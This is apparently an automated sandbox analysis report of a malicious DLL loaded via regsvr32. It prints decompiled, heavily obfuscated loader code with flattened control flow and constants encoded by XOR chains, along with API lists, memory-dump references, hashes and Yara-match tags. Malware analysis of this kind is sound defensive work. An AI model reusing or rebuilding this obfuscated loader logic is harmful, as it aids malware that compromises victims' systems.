																				_t364 = _t561 * _t561 * _t990 *  *0x1006c2cc * 2; // 0x3
																				_t366 = _t990 + 3; // 0x3
																				 *((intOrPtr*)(_t1025 + 0x38)) = _t366 *  *0x1006c2c4 -  *0x1006c2c8 + (_t366 *  *0x1006c2c4 -  *0x1006c2c8) * 2 - (_t561 * _t561 * _t990 *  *0x1006c2cc + _t364 + 3) *  *0x1006c2d0 + _t827 +  *((intOrPtr*)(_t1231 + 0x14));
																				return _t1025;
																			} else {
																				_t573 =  *0x1006c2c8; // 0x0
																				 *0x1006f040 = _t827 - _t990 + _t573 * 2 + (_t990 + _t573 * 2) * 4 +  *((intOrPtr*)(_t1231 + 0x14));
																				 *((intOrPtr*)(_t1025 + 0x10)) = 1;
																				return _t1025;
																			}
																		}
																	} else {
																		goto L30;
																	}
																}
															}
														}
													}
												} else {
													_t1026 =  *0x1006c2c0; // 0x0
													_t711 =  *0x1006c2cc; // 0x0
													 *((intOrPtr*)(_t1230 + 0x74))(_t1042, 0, _t928 - _t775 + (_t928 - _t775) * 2 - ((_t928 *  *0x1006c2bc * _t775 * _t1026 + 1) * _t711 * _t711 + (_t928 *  *0x1006c2bc * _t775 * _t1026 + 1) * _t711 * _t711 * 2 + (_t928 * _t1026 * _t1026 + 3 + _t928 * _t1026 * _t1026 * 2) * _t775) *  *0x1006c2c8 + 0x8000,  *((intOrPtr*)(_t1230 + 0x74)));
													goto L21;
												}
											} else {
												_t1113 =  *0x1006c2cc; // 0x0
												_t601 =  *0x1006c2bc; // 0x0
												_t178 = _t1113 + 1; // 0x1
												_t997 =  *0x1006c2c0; // 0x0
												_t843 =  *0x1006c2d0; // 0x0
												_t1032 =  *0x1006c2c8; // 0x0
												_t191 = _t843 + 1; // 0x1
												_t612 =  *((intOrPtr*)(_t1230 + 0x74))(0,  *((intOrPtr*)(_t1230 + 0x28)) + (_t843 - (_t191 * _t997 + 2) * _t1113 +  *0x1006c2c4) * 2, _t601 * _t997 * _t997 - _t1032 * _t1113 + 0x00002000 + (_t601 * _t997 * _t997 - _t1032 * _t1113) * 0x00000002 | 0x00001000 - _t1032 + _t1032 * 0x00000004, (4 + _t997 * 4 - _t601 * 4) * _t843 + _t601 * 4 + (_t178 *  *0x1006c2c4 * 4 - 4) * _t1113 + (1 -  *0x1006c2c8 - _t997) * 4,  *((intOrPtr*)(_t1230 + 0x74)));
												_t1042 = _t612;
												_t1230 = _t1230 + 0x14;
												 *((intOrPtr*)(_t1230 + 0x14)) = _t612;
												if(_t1042 == 0) {
													goto L21;
												} else {
													goto L19;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}















































































































































                                                                                                                0x10008de3
                                                                                                                0x10008dec
                                                                                                                0x10008df2
                                                                                                                0x10008df9
                                                                                                                0x10008e04
                                                                                                                0x10008e08
                                                                                                                0x10008e12
                                                                                                                0x10008e38
                                                                                                                0x10008e49
                                                                                                                0x10008e6e
                                                                                                                0x10008e73
                                                                                                                0x10008e78
                                                                                                                0x10009572
                                                                                                                0x10009578
                                                                                                                0x10008e7e
                                                                                                                0x10008e7e
                                                                                                                0x10008e8f
                                                                                                                0x10008eb7
                                                                                                                0x10008ebe
                                                                                                                0x10008ec7
                                                                                                                0x00000000
                                                                                                                0x10008ecd
                                                                                                                0x10008ed0
                                                                                                                0x10008ed9
                                                                                                                0x10008edd
                                                                                                                0x10008f08
                                                                                                                0x10008f1d
                                                                                                                0x10008f33
                                                                                                                0x10008f55
                                                                                                                0x10008f5b
                                                                                                                0x10008f6c
                                                                                                                0x10008f71
                                                                                                                0x10008f76
                                                                                                                0x00000000
                                                                                                                0x10008f7c
                                                                                                                0x10008f7c
                                                                                                                0x10008f8b
                                                                                                                0x10008f92
                                                                                                                0x10008f96
                                                                                                                0x10008fa4
                                                                                                                0x10008fa8
                                                                                                                0x10008fd1
                                                                                                                0x00000000
                                                                                                                0x10008fd7
                                                                                                                0x10008fd7
                                                                                                                0x10008ff3
                                                                                                                0x1000900a
                                                                                                                0x00000000
                                                                                                                0x10009010
                                                                                                                0x10009010
                                                                                                                0x10009023
                                                                                                                0x1000902c
                                                                                                                0x10009036
                                                                                                                0x00000000
                                                                                                                0x1000903c
                                                                                                                0x1000904c
                                                                                                                0x10009054
                                                                                                                0x10009061
                                                                                                                0x10009076
                                                                                                                0x10009081
                                                                                                                0x10009086
                                                                                                                0x1000919b
                                                                                                                0x1000908c
                                                                                                                0x1000908c
                                                                                                                0x10009095
                                                                                                                0x100090a6
                                                                                                                0x100090b6
                                                                                                                0x100090ba
                                                                                                                0x100090c5
                                                                                                                0x100090d0
                                                                                                                0x100090d8
                                                                                                                0x10009141
                                                                                                                0x100090da
                                                                                                                0x10009120
                                                                                                                0x10009120
                                                                                                                0x1000914b
                                                                                                                0x1000914d
                                                                                                                0x1000917d
                                                                                                                0x10009187
                                                                                                                0x10009187
                                                                                                                0x10009189
                                                                                                                0x1000918e
                                                                                                                0x1000918e
                                                                                                                0x1000918e
                                                                                                                0x10009199
                                                                                                                0x100091a9
                                                                                                                0x100091b9
                                                                                                                0x100091ce
                                                                                                                0x100091d4
                                                                                                                0x100091d9
                                                                                                                0x100091df
                                                                                                                0x100091e8
                                                                                                                0x100091ec
                                                                                                                0x10009205
                                                                                                                0x10009229
                                                                                                                0x10009242
                                                                                                                0x10009257
                                                                                                                0x1000925c
                                                                                                                0x1000926e
                                                                                                                0x10009272
                                                                                                                0x1000927a
                                                                                                                0x10009284
                                                                                                                0x10009289
                                                                                                                0x10009290
                                                                                                                0x00000000
                                                                                                                0x10009296
                                                                                                                0x10009296
                                                                                                                0x100092a1
                                                                                                                0x100092a7
                                                                                                                0x100092d6
                                                                                                                0x100092e1
                                                                                                                0x100092f1
                                                                                                                0x10009310
                                                                                                                0x1000932f
                                                                                                                0x10009342
                                                                                                                0x10009348
                                                                                                                0x1000937f
                                                                                                                0x10009381
                                                                                                                0x10009386
                                                                                                                0x1000938a
                                                                                                                0x10009445
                                                                                                                0x10009445
                                                                                                                0x1000944b
                                                                                                                0x10009450
                                                                                                                0x10009456
                                                                                                                0x10009465
                                                                                                                0x10009470
                                                                                                                0x10009477
                                                                                                                0x10009485
                                                                                                                0x1000949f
                                                                                                                0x100094aa
                                                                                                                0x100094b6
                                                                                                                0x100094bc
                                                                                                                0x100094c4
                                                                                                                0x100094c9
                                                                                                                0x100094d6
                                                                                                                0x100094ed
                                                                                                                0x1000950f
                                                                                                                0x10009511
                                                                                                                0x10009579
                                                                                                                0x1000957c
                                                                                                                0x10009582
                                                                                                                0x10009589
                                                                                                                0x1000959d
                                                                                                                0x100095bb
                                                                                                                0x100095bd
                                                                                                                0x100095c4
                                                                                                                0x100095cd
                                                                                                                0x100095d4
                                                                                                                0x100095db
                                                                                                                0x100095de
                                                                                                                0x100095e1
                                                                                                                0x100095e4
                                                                                                                0x100095ea
                                                                                                                0x100095f0
                                                                                                                0x10009628
                                                                                                                0x1000962e
                                                                                                                0x10009634
                                                                                                                0x1000963a
                                                                                                                0x10009650
                                                                                                                0x10009658
                                                                                                                0x10009662
                                                                                                                0x10009671
                                                                                                                0x10009681
                                                                                                                0x1000969d
                                                                                                                0x100096a2
                                                                                                                0x100096a7
                                                                                                                0x10009b34
                                                                                                                0x10009b35
                                                                                                                0x10009b46
                                                                                                                0x100096ad
                                                                                                                0x100096bf
                                                                                                                0x100096cb
                                                                                                                0x100096d1
                                                                                                                0x100096e9
                                                                                                                0x100096fe
                                                                                                                0x10009719
                                                                                                                0x10009737
                                                                                                                0x1000973b
                                                                                                                0x10009741
                                                                                                                0x10009743
                                                                                                                0x10009756
                                                                                                                0x10009764
                                                                                                                0x10009777
                                                                                                                0x1000978b
                                                                                                                0x10009796
                                                                                                                0x1000979c
                                                                                                                0x100097a1
                                                                                                                0x100097a7
                                                                                                                0x100097c9
                                                                                                                0x100097f5
                                                                                                                0x10009823
                                                                                                                0x10009826
                                                                                                                0x10009828
                                                                                                                0x10009833
                                                                                                                0x1000983b
                                                                                                                0x10009860
                                                                                                                0x10009863
                                                                                                                0x10009869
                                                                                                                0x1000987a
                                                                                                                0x1000988a
                                                                                                                0x10009890
                                                                                                                0x10009896
                                                                                                                0x100098ae
                                                                                                                0x100098c3
                                                                                                                0x100098c8
                                                                                                                0x100098c9
                                                                                                                0x100098d6
                                                                                                                0x10009920
                                                                                                                0x10009921
                                                                                                                0x10009922
                                                                                                                0x10009927
                                                                                                                0x1000992c
                                                                                                                0x00000000
                                                                                                                0x10009932
                                                                                                                0x10009932
                                                                                                                0x10009938
                                                                                                                0x1000993d
                                                                                                                0x10009943
                                                                                                                0x10009949
                                                                                                                0x1000994d
                                                                                                                0x10009955
                                                                                                                0x10009971
                                                                                                                0x10009974
                                                                                                                0x10009978
                                                                                                                0x10009a3b
                                                                                                                0x1000997e
                                                                                                                0x1000997e
                                                                                                                0x10009981
                                                                                                                0x100099a0
                                                                                                                0x100099c2
                                                                                                                0x100099c3
                                                                                                                0x100099fb
                                                                                                                0x100099fc
                                                                                                                0x10009a01
                                                                                                                0x10009a07
                                                                                                                0x10009a24
                                                                                                                0x10009a2e
                                                                                                                0x10009a36
                                                                                                                0x10009a36
                                                                                                                0x10009a42
                                                                                                                0x10009a48
                                                                                                                0x10009a4e
                                                                                                                0x10009a54
                                                                                                                0x10009a7e
                                                                                                                0x10009a7f
                                                                                                                0x10009a84
                                                                                                                0x10009a89
                                                                                                                0x00000000
                                                                                                                0x10009a8f
                                                                                                                0x10009a8f
                                                                                                                0x10009a95
                                                                                                                0x10009a9b
                                                                                                                0x10009aa2
                                                                                                                0x10009aa6
                                                                                                                0x10009abb
                                                                                                                0x10009ac3
                                                                                                                0x10009ad6
                                                                                                                0x10009ad7
                                                                                                                0x10009adc
                                                                                                                0x10009ae1
                                                                                                                0x00000000
                                                                                                                0x10009ae3
                                                                                                                0x10009ae3
                                                                                                                0x10009ae9
                                                                                                                0x10009aef
                                                                                                                0x10009b03
                                                                                                                0x10009b09
                                                                                                                0x10009b28
                                                                                                                0x10009b2d
                                                                                                                0x10009b32
                                                                                                                0x10009b49
                                                                                                                0x10009b4e
                                                                                                                0x10009bc9
                                                                                                                0x10009bd9
                                                                                                                0x10009b50
                                                                                                                0x10009b54
                                                                                                                0x10009b5a
                                                                                                                0x10009b84
                                                                                                                0x10009b96
                                                                                                                0x10009ba1
                                                                                                                0x10009bbc
                                                                                                                0x10009bc8
                                                                                                                0x10009b5c
                                                                                                                0x10009b5c
                                                                                                                0x10009b6f
                                                                                                                0x10009b75
                                                                                                                0x10009b83
                                                                                                                0x10009b83
                                                                                                                0x10009b5a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10009b32
                                                                                                                0x10009ae1
                                                                                                                0x10009a89
                                                                                                                0x1000992c
                                                                                                                0x10009513
                                                                                                                0x10009518
                                                                                                                0x10009527
                                                                                                                0x10009568
                                                                                                                0x00000000
                                                                                                                0x1000956c
                                                                                                                0x10009390
                                                                                                                0x10009390
                                                                                                                0x1000939a
                                                                                                                0x1000939f
                                                                                                                0x100093b1
                                                                                                                0x100093d0
                                                                                                                0x100093f1
                                                                                                                0x10009412
                                                                                                                0x10009430
                                                                                                                0x10009434
                                                                                                                0x10009436
                                                                                                                0x1000943b
                                                                                                                0x1000943f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000943f
                                                                                                                0x1000938a
                                                                                                                0x10009290
                                                                                                                0x10009036
                                                                                                                0x1000900a
                                                                                                                0x10008fd1
                                                                                                                0x10008f76
                                                                                                                0x10008ec7

                                                                                                                APIs
                                                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 100091CE
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-0000003F), ref: 100094AF
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,10009DAA), ref: 100094B6
                                                                                                                • memcpy.MSVCRT ref: 10009796
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1755227880-3887548279
                                                                                                                • Opcode ID: ba75ff60e5f2714c780d4be58c1794a7b13bfb6c1ff3e390fb067a0a49a6c575
                                                                                                                • Instruction ID: 0db02a502ad7d83fd3fc5af0a51278123ea01100e51ef93ccf9851d7776962ba
                                                                                                                • Opcode Fuzzy Hash: ba75ff60e5f2714c780d4be58c1794a7b13bfb6c1ff3e390fb067a0a49a6c575
                                                                                                                • Instruction Fuzzy Hash: 97926932A0421B8FD718DF6CCED5D69B7A6FB94704F05822ADC058B3B5E6B4E915CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A8844 Relevance: 9.0, Strings: 7, Instructions: 256COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 483 1a8844-1a8b42 484 1a8b4a-1a8b4c 483->484 485 1a8b52 484->485 486 1a8c06-1a8c0c 484->486 489 1a8b58-1a8b5e 485->489 490 1a8bf4-1a8c01 485->490 487 1a8c0e-1a8c14 486->487 488 1a8c6f-1a8c7d call 1bed7b 486->488 492 1a8c60-1a8c6a call 1a7761 487->492 493 1a8c16-1a8c1c 487->493 499 1a8c82-1a8c84 488->499 494 1a8b60-1a8b62 489->494 495 1a8bc6-1a8bef call 1a303a 489->495 490->484 492->484 501 1a8c1e-1a8c33 call 1a6e01 493->501 502 1a8c86-1a8c8c 493->502 496 1a8b88-1a8baf call 1a3466 494->496 497 1a8b64-1a8b6a 494->497 495->484 511 1a8bb4-1a8bc4 496->511 503 1a8b70-1a8b76 497->503 504 1a8c94-1a8cd4 call 1c0575 call 1ab9f6 497->504 499->502 514 1a8c38-1a8c3f 501->514 502->484 508 1a8c92 502->508 503->502 510 1a8b7c-1a8b86 503->510 512 1a8cda-1a8ce6 504->512 508->512 510->484 511->484 515 1a8c41-1a8c51 514->515 516 1a8c56-1a8c5b 514->516 515->484 516->484
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E001A8844() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _t245;
				intOrPtr _t246;
				signed int _t248;
				void* _t249;
				intOrPtr _t253;
				signed int _t256;
				intOrPtr _t257;
				void* _t259;
				intOrPtr _t269;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				void* _t297;
				signed int* _t299;
				void* _t302;

				_t299 =  &_v624;
				_v616 = 0x27897;
				_t259 = 0x3f7b64;
				_v616 = _v616 * 0x1d;
				_t297 = 0;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0x9ed7;
				_v616 = _v616 ^ 0x0000b0dd;
				_v592 = 0x1544e1;
				_v592 = _v592 ^ 0x08454b80;
				_v592 = _v592 << 0xf;
				_v592 = _v592 ^ 0x07b08029;
				_v540 = 0xdd6b68;
				_t289 = 0x61;
				_v540 = _v540 * 0x61;
				_v540 = _v540 ^ 0x53eab257;
				_v564 = 0xa2b647;
				_v564 = _v564 + 0xab34;
				_v564 = _v564 ^ 0x00a2d3be;
				_v612 = 0xb49279;
				_v612 = _v612 / _t289;
				_t290 = 0xe;
				_v612 = _v612 * 0x25;
				_v612 = _v612 + 0xaeb2;
				_v612 = _v612 ^ 0x004bef51;
				_v576 = 0x67ecec;
				_v576 = _v576 >> 8;
				_v576 = _v576 ^ 0x000e8e6e;
				_v584 = 0x19b5b7;
				_v584 = _v584 | 0x66393fe5;
				_t48 =  &_v584; // 0x66393fe5
				_v584 =  *_t48 / _t290;
				_v584 = _v584 ^ 0x074699c7;
				_v528 = 0x9271a1;
				_t291 = 0x34;
				_v528 = _v528 * 0x73;
				_v528 = _v528 ^ 0x41c91186;
				_v556 = 0xbc268a;
				_v556 = _v556 << 7;
				_v556 = _v556 ^ 0x5e14820a;
				_v604 = 0x3da2d4;
				_v604 = _v604 + 0x1199;
				_v604 = _v604 * 0x5c;
				_v604 = _v604 ^ 0x16272749;
				_v572 = 0x4dedcc;
				_v572 = _v572 >> 0xf;
				_v572 = _v572 ^ 0x0000b92d;
				_v596 = 0x5cd635;
				_v596 = _v596 / _t291;
				_v596 = _v596 | 0x82bc2330;
				_v596 = _v596 ^ 0x82bff634;
				_v548 = 0xf9b637;
				_v548 = _v548 + 0xffff2194;
				_v548 = _v548 ^ 0x00fee79d;
				_v620 = 0x80c27c;
				_v620 = _v620 | 0xff7ff4fa;
				_t292 = 0x44;
				_v620 = _v620 / _t292;
				_v620 = _v620 ^ 0x03c7a1d8;
				_v608 = 0x850b30;
				_v608 = _v608 << 0xa;
				_v608 = _v608 + 0x5503;
				_v608 = _v608 ^ 0x142577ae;
				_v532 = 0x3be4d6;
				_v532 = _v532 >> 7;
				_v532 = _v532 ^ 0x00096fb3;
				_v600 = 0xb1eb64;
				_v600 = _v600 << 0xc;
				_v600 = _v600 ^ 0x75f6948e;
				_v600 = _v600 ^ 0x6b439af9;
				_v624 = 0xb462c4;
				_t293 = 0x27;
				_v624 = _v624 * 0x28;
				_v624 = _v624 / _t293;
				_v624 = _v624 >> 4;
				_v624 = _v624 ^ 0x000206b0;
				_v560 = 0x298ba8;
				_v560 = _v560 + 0x5167;
				_v560 = _v560 ^ 0x002f83a2;
				_v568 = 0x1db1fc;
				_v568 = _v568 + 0x97b5;
				_v568 = _v568 ^ 0x0016a8ad;
				_v588 = 0x8218a;
				_t294 = 6;
				_v588 = _v588 * 0x7a;
				_v588 = _v588 >> 7;
				_v588 = _v588 ^ 0x0000bc59;
				_v536 = 0x35ef93;
				_v536 = _v536 >> 0xb;
				_v536 = _v536 ^ 0x000d3c68;
				_v580 = 0xba3b2f;
				_v580 = _v580 ^ 0x2bb047f3;
				_v580 = _v580 / _t294;
				_v580 = _v580 ^ 0x0729b7a4;
				_v544 = 0xbfe3f3;
				_t295 = 0x1e;
				_t296 = _v524;
				_v544 = _v544 / _t295;
				_v544 = _v544 ^ 0x00090887;
				_v552 = 0x9ca452;
				_v552 = _v552 + 0xb547;
				_v552 = _v552 ^ 0x00934e46;
				goto L1;
				do {
					while(1) {
						L1:
						_t302 = _t259 - 0xa3bf845;
						if(_t302 > 0) {
							break;
						}
						if(_t302 == 0) {
							_t259 = 0xa613c96;
							_v524 = _v592;
							continue;
						}
						if(_t259 == 0x3f7b64) {
							_push(_t259);
							_t245 = E001A303A(_t259, 0x438);
							_t299 =  &(_t299[3]);
							 *0x1c4c10 = _t245;
							_t259 = 0xfdec696;
							continue;
						}
						if(_t259 == 0x19bcfc7) {
							_t246 =  *0x1c4c10; // 0x67d820
							_t248 = E001A3466(_v524, _v620, _t259, _t259, _t246 + 4, _v608, _t259, _v532, _v600, _v624); // executed
							_t299 =  &(_t299[8]);
							_t259 = 0xfaba0ff;
							__eflags = _t248;
							_t249 = 1;
							_t297 =  ==  ? _t249 : _t297;
							continue;
						}
						if(_t259 == 0x2e52b63) {
							E001C0575(_v560, _v568, __eflags, _t259,  &_v520, _v588);
							_t253 = E001AB9F6(_v536, _v580, _v544,  &_v520, _v552);
							_t269 =  *0x1c4c10; // 0x67d820
							 *((intOrPtr*)(_t269 + 0x428)) = _t253;
							L22:
							return _t297;
						}
						if(_t259 != 0x6fd0dd4) {
							goto L19;
						}
						_t259 = 0x19bcfc7;
						_v524 = _v616;
					}
					__eflags = _t259 - 0xa613c96;
					if(_t259 == 0xa613c96) {
						E001BED7B(_t296, _v572, _v596, _v548); // executed
						_t259 = 0x19bcfc7;
						goto L19;
					}
					__eflags = _t259 - 0xfaba0ff;
					if(_t259 == 0xfaba0ff) {
						E001A7761();
						_t259 = 0x2e52b63;
						goto L1;
					}
					__eflags = _t259 - 0xfdec696;
					if(_t259 != 0xfdec696) {
						goto L19;
					}
					_push(_t259);
					_t256 = E001A6E01(_v528, _v556, _t259, _v604, _v540); // executed
					_t296 = _t256;
					_t299 =  &(_t299[4]);
					__eflags = _t256;
					if(__eflags == 0) {
						_t259 = 0x6fd0dd4;
					} else {
						_t257 =  *0x1c4c10; // 0x67d820
						 *((intOrPtr*)(_t257 + 0x414)) = 1;
						_t259 = 0xa3bf845;
					}
					goto L1;
					L19:
					__eflags = _t259 - 0x262755a;
				} while (__eflags != 0);
				goto L22;
			}

















































                                                                                                                0x001a8844
                                                                                                                0x001a884a
                                                                                                                0x001a8859
                                                                                                                0x001a8862
                                                                                                                0x001a8866
                                                                                                                0x001a8868
                                                                                                                0x001a886d
                                                                                                                0x001a8875
                                                                                                                0x001a887d
                                                                                                                0x001a8885
                                                                                                                0x001a888d
                                                                                                                0x001a8892
                                                                                                                0x001a889a
                                                                                                                0x001a88a9
                                                                                                                0x001a88ac
                                                                                                                0x001a88b0
                                                                                                                0x001a88b8
                                                                                                                0x001a88c0
                                                                                                                0x001a88c8
                                                                                                                0x001a88d0
                                                                                                                0x001a88e0
                                                                                                                0x001a88e9
                                                                                                                0x001a88ec
                                                                                                                0x001a88f0
                                                                                                                0x001a88f8
                                                                                                                0x001a8900
                                                                                                                0x001a8908
                                                                                                                0x001a890d
                                                                                                                0x001a8915
                                                                                                                0x001a891d
                                                                                                                0x001a8925
                                                                                                                0x001a892d
                                                                                                                0x001a8931
                                                                                                                0x001a8939
                                                                                                                0x001a8946
                                                                                                                0x001a8949
                                                                                                                0x001a894d
                                                                                                                0x001a8955
                                                                                                                0x001a895d
                                                                                                                0x001a8962
                                                                                                                0x001a896a
                                                                                                                0x001a8972
                                                                                                                0x001a897f
                                                                                                                0x001a8983
                                                                                                                0x001a898b
                                                                                                                0x001a8993
                                                                                                                0x001a8998
                                                                                                                0x001a89a0
                                                                                                                0x001a89b0
                                                                                                                0x001a89b4
                                                                                                                0x001a89bc
                                                                                                                0x001a89c4
                                                                                                                0x001a89cc
                                                                                                                0x001a89d4
                                                                                                                0x001a89dc
                                                                                                                0x001a89e4
                                                                                                                0x001a89f0
                                                                                                                0x001a89f3
                                                                                                                0x001a89f7
                                                                                                                0x001a8a01
                                                                                                                0x001a8a0e
                                                                                                                0x001a8a18
                                                                                                                0x001a8a20
                                                                                                                0x001a8a28
                                                                                                                0x001a8a30
                                                                                                                0x001a8a35
                                                                                                                0x001a8a3d
                                                                                                                0x001a8a45
                                                                                                                0x001a8a4a
                                                                                                                0x001a8a52
                                                                                                                0x001a8a5a
                                                                                                                0x001a8a69
                                                                                                                0x001a8a6c
                                                                                                                0x001a8a78
                                                                                                                0x001a8a7c
                                                                                                                0x001a8a81
                                                                                                                0x001a8a89
                                                                                                                0x001a8a91
                                                                                                                0x001a8a99
                                                                                                                0x001a8aa1
                                                                                                                0x001a8aa9
                                                                                                                0x001a8ab1
                                                                                                                0x001a8ab9
                                                                                                                0x001a8ac6
                                                                                                                0x001a8ac9
                                                                                                                0x001a8acd
                                                                                                                0x001a8ad2
                                                                                                                0x001a8ada
                                                                                                                0x001a8ae2
                                                                                                                0x001a8ae7
                                                                                                                0x001a8aef
                                                                                                                0x001a8af7
                                                                                                                0x001a8b07
                                                                                                                0x001a8b0b
                                                                                                                0x001a8b13
                                                                                                                0x001a8b1f
                                                                                                                0x001a8b22
                                                                                                                0x001a8b26
                                                                                                                0x001a8b2a
                                                                                                                0x001a8b32
                                                                                                                0x001a8b3a
                                                                                                                0x001a8b42
                                                                                                                0x001a8b42
                                                                                                                0x001a8b4a
                                                                                                                0x001a8b4a
                                                                                                                0x001a8b4a
                                                                                                                0x001a8b4a
                                                                                                                0x001a8b4c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a8b52
                                                                                                                0x001a8bf8
                                                                                                                0x001a8bfd
                                                                                                                0x00000000
                                                                                                                0x001a8bfd
                                                                                                                0x001a8b5e
                                                                                                                0x001a8bd6
                                                                                                                0x001a8bdd
                                                                                                                0x001a8be2
                                                                                                                0x001a8be5
                                                                                                                0x001a8bea
                                                                                                                0x00000000
                                                                                                                0x001a8bea
                                                                                                                0x001a8b62
                                                                                                                0x001a8b99
                                                                                                                0x001a8baf
                                                                                                                0x001a8bb4
                                                                                                                0x001a8bb7
                                                                                                                0x001a8bbc
                                                                                                                0x001a8bc0
                                                                                                                0x001a8bc1
                                                                                                                0x00000000
                                                                                                                0x001a8bc1
                                                                                                                0x001a8b6a
                                                                                                                0x001a8ca6
                                                                                                                0x001a8cc6
                                                                                                                0x001a8ccb
                                                                                                                0x001a8cd4
                                                                                                                0x001a8cdb
                                                                                                                0x001a8ce6
                                                                                                                0x001a8ce6
                                                                                                                0x001a8b76
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a8b80
                                                                                                                0x001a8b82
                                                                                                                0x001a8b82
                                                                                                                0x001a8c06
                                                                                                                0x001a8c0c
                                                                                                                0x001a8c7d
                                                                                                                0x001a8c84
                                                                                                                0x00000000
                                                                                                                0x001a8c84
                                                                                                                0x001a8c0e
                                                                                                                0x001a8c14
                                                                                                                0x001a8c60
                                                                                                                0x001a8c65
                                                                                                                0x00000000
                                                                                                                0x001a8c65
                                                                                                                0x001a8c16
                                                                                                                0x001a8c1c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a8c1e
                                                                                                                0x001a8c33
                                                                                                                0x001a8c38
                                                                                                                0x001a8c3a
                                                                                                                0x001a8c3d
                                                                                                                0x001a8c3f
                                                                                                                0x001a8c56
                                                                                                                0x001a8c41
                                                                                                                0x001a8c41
                                                                                                                0x001a8c49
                                                                                                                0x001a8c4f
                                                                                                                0x001a8c4f
                                                                                                                0x00000000
                                                                                                                0x001a8c86
                                                                                                                0x001a8c86
                                                                                                                0x001a8c86
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: QK$d{?$d{?$gQ$h<$?9f$g
                                                                                                                • API String ID: 0-2100959024
                                                                                                                • Opcode ID: ca7c65749704e20489eb5d2a5cb1230cfc15a2ef6326ac99f1bcdb2c4db13434
                                                                                                                • Instruction ID: f37ecd5528c25766d8b3cfcf602adac2d9183ec136ff4deb9fd6190366f5e75f
                                                                                                                • Opcode Fuzzy Hash: ca7c65749704e20489eb5d2a5cb1230cfc15a2ef6326ac99f1bcdb2c4db13434
                                                                                                                • Instruction Fuzzy Hash: 29C13FB5108380DFC358CF25D58A91BFBE1FBC4718F104A1DF6969A260DBB58988CF56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001C0E7A Relevance: 9.0, Strings: 7, Instructions: 248COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 520 1c0e7a-1c119a 521 1c11a2-1c11a8 520->521 522 1c12bd-1c12d5 call 1c2545 521->522 523 1c11ae-1c11b0 521->523 534 1c12da-1c12e0 522->534 524 1c1269-1c12a4 call 1ba50a 523->524 525 1c11b6-1c11bc 523->525 531 1c12a9-1c12b1 524->531 528 1c12e8-1c1305 call 1a2221 525->528 529 1c11c2-1c11c8 525->529 536 1c1310-1c131c 528->536 544 1c1307 528->544 532 1c11ce-1c11d4 529->532 533 1c125f-1c1264 529->533 531->536 537 1c12b3-1c12b8 531->537 538 1c11d6-1c11dc 532->538 539 1c1233-1c1252 call 1c0575 532->539 533->521 534->521 540 1c12e6 534->540 537->521 538->534 542 1c11e2-1c1226 call 1b91cc call 1b02d8 538->542 539->536 550 1c1258-1c125a 539->550 540->536 552 1c122b-1c122e 542->552 547 1c130d-1c130f 544->547 548 1c1309-1c130b 544->548 547->536 548->536 548->547 550->521 552->534
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001C0E7A() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
